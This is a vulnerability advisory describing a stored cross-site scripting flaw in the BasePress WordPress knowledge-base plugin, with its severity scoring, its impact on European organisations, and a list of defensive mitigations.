CVE-2025-62761 is a Stored Cross-site Scripting (XSS) vulnerability classified under CWE-79, found in the BasePress Knowledge Base documentation & wiki plugin for WordPress. This vulnerability exists due to improper neutralization of input during web page generation, which allows malicious actors to inject and store malicious scripts within the plugin's content. When other users view the affected pages, the malicious scripts execute in their browsers, potentially leading to session hijacking, privilege escalation, or unauthorized actions within the context of the affected site. The vulnerability affects all versions up to 2.17.0.1 and requires the attacker to have at least low privileges (PR:L) and user interaction (UI:R) for exploitation. The CVSS v3.1 score is 6.5, indicating a medium severity with network attack vector (AV:N), low attack complexity (AC:L), and a scope change (S:C) that implies the vulnerability can affect resources beyond the initially vulnerable component. Although no public exploits are currently known, the vulnerability poses a risk to organizations relying on BasePress for knowledge base or wiki functionalities, especially where multiple users have editing rights. The lack of available patches necessitates immediate mitigation efforts to reduce exposure. This vulnerability highlights the importance of proper input validation and output encoding in web applications to prevent XSS attacks.

For European organizations, this vulnerability can lead to unauthorized script execution within internal knowledge base portals, potentially compromising user sessions, leaking sensitive information, or enabling further attacks such as privilege escalation or lateral movement. Organizations that use BasePress to manage internal documentation or customer-facing knowledge bases could see disruptions in availability or integrity of their content. The impact is amplified in environments where multiple users have editing privileges, increasing the risk of malicious content injection. Confidentiality could be partially compromised if session cookies or tokens are stolen. Integrity and availability risks arise from potential defacement or denial of service caused by malicious scripts. The medium severity rating suggests that while the threat is not critical, it is significant enough to warrant immediate attention, especially in sectors with strict data protection regulations such as GDPR. Failure to address this vulnerability could lead to reputational damage and regulatory penalties if exploited.

1. Immediately restrict editing privileges to trusted users only, minimizing the number of users who can inject content. 2. Implement strict input validation and output encoding on all user-generated content within the BasePress plugin, using established libraries or frameworks that sanitize HTML and script inputs. 3. Monitor logs and user activity for unusual behavior or unexpected content changes that could indicate exploitation attempts. 4. Deploy Content Security Policy (CSP) headers to limit the execution of unauthorized scripts in browsers. 5. Regularly back up knowledge base content to enable quick restoration in case of defacement or data corruption. 6. Stay informed about updates from the BasePress vendor and apply patches promptly once released. 7. Conduct internal security awareness training for users with editing rights to recognize and report suspicious activity. 8. Consider isolating the knowledge base environment or limiting its exposure to external networks if feasible. 9. Use web application firewalls (WAFs) configured to detect and block XSS payloads targeting the plugin. 10. Perform periodic security assessments and penetration testing focused on the knowledge base platform to identify residual risks.